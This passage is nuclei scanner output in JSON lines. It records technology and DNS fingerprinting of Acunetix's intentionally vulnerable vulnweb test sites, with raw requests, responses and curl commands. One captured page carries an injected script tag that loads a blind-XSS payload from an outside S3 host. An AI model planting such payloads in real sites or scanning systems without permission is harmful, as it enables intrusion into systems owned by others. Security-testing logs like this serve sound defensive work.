Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"nginx\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/like\",\"path\":\"/like\",\"matched-at\":\"http://testhtml5.vulnweb.com/like\",\"request\":\"GET /like HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:36 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Thank you very much for your feedback! \\u003c!-- invalid --\\u003e\\n\\u003clink src='http://localhost/link'\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:40.547013742Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:51.0) Gecko/20100101 Firefox/51.0' 'http://testhtml5.vulnweb.com/like'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"google-font-api\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/logout\",\"path\":\"/logout\",\"matched-at\":\"http://testhtml5.vulnweb.com/\",\"request\":\"GET /logout HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nAccess-Control-Allow-Origin: *\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:34:37 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n\\n \\u003clink rel=\\\"icon\\\" type=\\\"image/png\\\" href=\\\"http://www.acunetix.com/favicon.ico\\\"\\u003e\\n\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:34:40.877776366Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36' 'http://testhtml5.vulnweb.com/logout'\",\"matcher-status\":true}\n{\"template\":\"http/technologies/tech-detect.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/tech-detect\",\"template-id\":\"tech-detect\",\"template-path\":\"/home/rengine/nuclei-templates/http/technologies/tech-detect.yaml\",\"info\":{\"name\":\"Wappalyzer Technology Detection\",\"author\":[\"hakluke\",\"righettod\"],\"tags\":[\"tech\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"ms-iis\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 301 Moved Permanently\\r\\nConnection: close\\r\\nContent-Length: 152\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:34:32 GMT\\r\\nLocation: http://testasp.vulnweb.com/T/\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:34:40.93542346Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0: Win64: x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.0.0' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 41761\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 41761\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3600\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.217301249Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS server.\",\"reference\":[\"https://www.netspi.com/blog/technical/network-penetration-testing/analyzing-dns-txt-records-to-fingerprint-service-providers/\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testphp.vulnweb.com\",\"matched-at\":\"testphp.vulnweb.com\",\"extracted-results\":[\"\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\"],\"request\":\";; opcode: QUERY, status: NOERROR, id: 44265\\n;; flags: rd ad; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 44265\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 512\\n\\n;; QUESTION SECTION:\\n;testphp.vulnweb.com.\\tIN\\t TXT\\n\\n;; ANSWER SECTION:\\ntestphp.vulnweb.com.\\t3599\\tIN\\tTXT\\t\\\"google-site-verification:toEctYsulNIxgraKk7H3z58PCyz2IOCc36pIupEPmYQ\\\"\\n\",\"timestamp\":\"2024-11-13T02:34:41.222286654Z\",\"matcher-status\":true}\n{\"template\":\"dns/caa-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/caa-fingerprint\",\"template-id\":\"caa-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/caa-fingerprint.yaml\",\"info\":{\"name\":\"CAA Record\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"caa\"],\"description\":\"A CAA record was discovered. A CAA record is used to specify which certificate authorities (CAs) are allowed to issue certificates for a domain.\",\"reference\":[\"https://support.dnsimple.com/articles/caa-record/#whats-a-caa-record\"],\"severity\":\"info\",\"metadata\":{\"max-request\":1},\"classification\":{\"cve-id\":null,\"cwe-id\":[\"cwe-200\"]}},\"type\":\"dns\",\"host\":\"testhtml5.vulnweb.com\",\"matched-at\":\"testhtml5.vulnweb.com\",\"request\":\";; opcode: QUERY, status: NOERROR, id: 26998\\n;; flags: rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 4096\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\",\"response\":\";; opcode: QUERY, status: NOERROR, id: 26998\\n;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1\\n\\n;; OPT PSEUDOSECTION:\\n; EDNS: version 0; flags:; udp: 1232\\n\\n;; QUESTION SECTION:\\n;testhtml5.vulnweb.com.\\tIN\\t CAA\\n\\n;; AUTHORITY SECTION:\\nvulnweb.com.\\t86394\\tIN\\tSOA\\tns1.eurodns.com. hostmaster.eurodns.com. 2024111200 86400 7200 604800 86400\\n\",\"timestamp\":\"2024-11-13T02:34:41.223501325Z\",\"matcher-status\":true}\n{\"template\":\"dns/txt-fingerprint.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/txt-fingerprint\",\"template-id\":\"txt-fingerprint\",\"template-path\":\"/home/rengine/nuclei-templates/dns/txt-fingerprint.yaml\",\"info\":{\"name\":\"DNS TXT Record Detected\",\"author\":[\"pdteam\"],\"tags\":[\"dns\",\"txt\"],\"description\":\"A DNS TXT record was detected. The TXT record lets a domain admin leave notes on a DNS 